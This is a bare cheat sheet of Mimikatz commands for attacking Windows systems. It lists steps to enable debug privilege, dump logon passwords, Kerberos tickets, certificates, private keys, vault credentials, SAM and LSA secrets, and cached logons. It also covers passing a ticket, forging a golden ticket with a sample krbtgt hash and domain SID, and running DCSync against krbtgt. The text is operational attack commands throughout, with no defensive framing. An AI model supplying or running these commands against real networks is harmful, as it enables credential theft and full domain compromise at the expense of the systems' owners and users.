Mimikatz Commands

Enable the debug privilege (SeDebugPrivilege); do this FIRST:

  • privilege::debug

Extract Passwords using Sekurlsa Commands:

  • sekurlsa::logonpasswords
  • sekurlsa::tickets /export

Kerberos Commands:

  • kerberos::list /export
  • kerberos::ptt c:\chocolate.kirbi
  • kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

Crypto:

  • crypto::capi
  • crypto::cng
  • crypto::certificates /export
  • crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
  • crypto::keys /export
  • crypto::keys /machine /export

Vault & lsadump:

  • vault::cred
  • vault::list
  • token::elevate
  • vault::cred
  • vault::list
  • lsadump::sam
  • lsadump::secrets
  • lsadump::cache
  • token::revert
  • lsadump::dcsync /user:domain\krbtgt /domain:lab.local